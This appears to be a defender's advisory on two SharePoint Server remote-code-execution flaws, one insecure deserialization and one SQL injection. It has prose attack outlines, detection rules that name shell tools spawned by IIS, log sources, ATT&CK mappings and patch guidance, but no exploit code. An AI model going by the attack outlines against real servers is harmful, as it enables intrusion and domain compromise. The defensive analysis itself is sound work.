High-Risk Remote Code Execution Vulnerabilities
The two vulnerabilities listed below affect the same product family: Microsoft SharePoint Server (on-premises).
While the technical root cause differs, both issues can realistically lead to full server compromise when SharePoint is exposed or insufficiently hardened.
This document is written from a defender’s and analyst’s perspective, explaining how these flaws are abused in the real world, what exploitation looks like, and how security teams can detect and respond—without academic language or copied descriptions.
Product Details
- Product: Microsoft SharePoint Server (Subscription Edition / 2019 / 2016 – varies by deployment)
- Deployment Type: On-premises
- Application Stack:
- IIS (w3wp.exe)
- ASP.NET
- SQL Server backend
- Typical Exposure:
- Internet-facing portals
- VPN-accessible intranet
- Hybrid environments
- Execution Context:
- SharePoint Application Pool account
- Often has high privileges in domain environments
High-Level Comparison Table
| Category | CVE-2026-20963 | CVE-2026-20947 |
|---|---|---|
| Vulnerability Type | Insecure Deserialization | SQL Injection |
| Primary Attack Surface | SharePoint web/API endpoints | SharePoint database-backed pages/APIs |
| Initial Access | Malicious serialized input | Crafted SQL payload in parameters |
| Authentication Needed | No (common scenarios) | Sometimes (endpoint dependent) |
| Skill Level Required | Medium | Low to Medium |
| Likelihood of Exploitation | High | Very High |
| Impact | Remote Code Execution | Remote Code Execution |
| Lateral Movement Potential | High | High |
| Detection Difficulty | Medium | Medium |
| Patch Availability | Yes (official Microsoft update) | Yes (official Microsoft update) |
CVE-2026-20963 – Insecure Deserialization Leading to RCE
What Is Really Going Wrong
SharePoint processes serialized objects as part of its internal workflows and API logic.
The vulnerable component trusts incoming serialized data too much and does not enforce strict rules on what object types can be reconstructed in memory.
When SharePoint deserializes attacker-controlled data:
- Objects are instantiated automatically
- Certain .NET classes execute code during initialization
- No explicit command execution call is required
This makes exploitation silent and reliable.
How an Attacker Would Exploit This
- Attacker locates a SharePoint endpoint that accepts structured or encoded data.
- A malicious serialized object is crafted using known .NET gadget chains.
- Payload is embedded inside an HTTP request (often Base64-encoded).
- SharePoint deserializes the object during request processing.
- Code executes immediately under the IIS worker process.
At this point, the attacker can:
- Run system commands
- Drop web shells
- Execute PowerShell
- Pivot into the domain
Exploitation & PoC Status
- No public weaponized exploit is widely distributed.
- Proof-of-concept payloads do exist in private research circles.
- Exploitation is considered practically achievable using standard .NET deserialization techniques.
- Used primarily in targeted intrusions, not mass scanning (yet).
How This Can Be Detected in Real Environments
Common Red Flags
- IIS worker process spawning command-line tools
- SharePoint errors followed by unexpected service restarts
- Strange encoded blobs in POST requests
Key Log Sources
| Log Source | What to Watch |
|---|---|
| IIS Logs | Long encoded parameters, repeated POSTs |
| SharePoint ULS Logs | Deserialization or object type errors |
| Windows Security Logs | Process creation from w3wp.exe |
| EDR/XDR | PowerShell or cmd.exe launched by IIS |
Detection Logic
- Alert if
w3wp.exelaunches:powershell.execmd.exemshta.exe
- Flag HTTP requests containing:
- Very large Base64 strings
- Repeated failures followed by success
- Monitor for unexpected file writes in web directories
MITRE ATT&CK Mapping
- Exploit Public-Facing Application (T1190)
- Command and Scripting Interpreter (T1059)
- Web Shell (T1505)
- Privilege Escalation via Exploitation (T1068)
CVE-2026-20947 – SQL Injection Leading to RCE
What Is Really Going Wrong
A SharePoint component dynamically builds SQL queries using user-supplied input without enforcing proper parameterization.
This allows attackers to:
- Manipulate database queries
- Access or modify SharePoint content databases
- Chain SQL execution into operating system-level code execution
Once SQL Server is abused, SharePoint is effectively lost.
How an Attacker Would Exploit This
- Attacker identifies a vulnerable parameter in a page or API.
- SQL payload is injected into the request.
- Database executes attacker-controlled SQL.
- Attacker escalates from data access to command execution.
- Persistent access is established on the server.
This vulnerability is especially dangerous because:
- SQL injection is easy to test
- Many detection tools miss low-noise payloads
- Database access often leads to domain compromise
Exploitation & PoC Status
- No official public exploit release.
- SQL injection techniques are well-known and mature.
- Exploitation can be validated using:
- Error-based behavior
- Time-delay responses
- Practical exploitation is considered highly feasible.
How This Can Be Detected in Real Environments
Common Red Flags
- Database errors appearing in HTTP responses
- Unusual query execution patterns
- Performance degradation during attacks
Key Log Sources
| Log Source | What to Watch |
|---|---|
| IIS Logs | Special characters in request parameters |
| SQL Server Logs | Abnormal query structures |
| SharePoint ULS Logs | Database execution failures |
| Database Auditing | Privilege escalation attempts |
Detection Logic
- Alert on:
- SQL errors tied to a single client IP
- Repeated failed queries with minor variations
- Monitor for:
- SQL Server spawning OS-level processes
- Unexpected stored procedure execution
MITRE ATT&CK Mapping
- Exploit Public-Facing Application (T1190)
- SQL Stored Procedures (T1505)
- Privilege Escalation (T1068)
- Data and System Manipulation (T1565)
Risk Summary
| Area | Risk Level |
|---|---|
| Internet-Exposed SharePoint | Critical |
| Internal-Only SharePoint | High |
| Unpatched Legacy Versions | Critical |
| Weak Monitoring | Severe |
| Domain-Joined SharePoint | Extreme |
Once exploited, both vulnerabilities allow attackers to fully own the server and often the surrounding Active Directory environment.
Official Remediation
Action Required Immediately
- Apply the latest Microsoft SharePoint Security Updates
- Use the official Microsoft patch channel only:
👉 https://msrc.microsoft.com/update-guide
Post-Patch Actions
- Restart SharePoint services
- Verify build versions
- Re-scan exposed endpoints
- Review logs for pre-patch compromise indicators
Final Defender Notes
These are not theoretical issues.
They represent real attack paths used in targeted intrusions, especially against organizations running on-premises SharePoint.
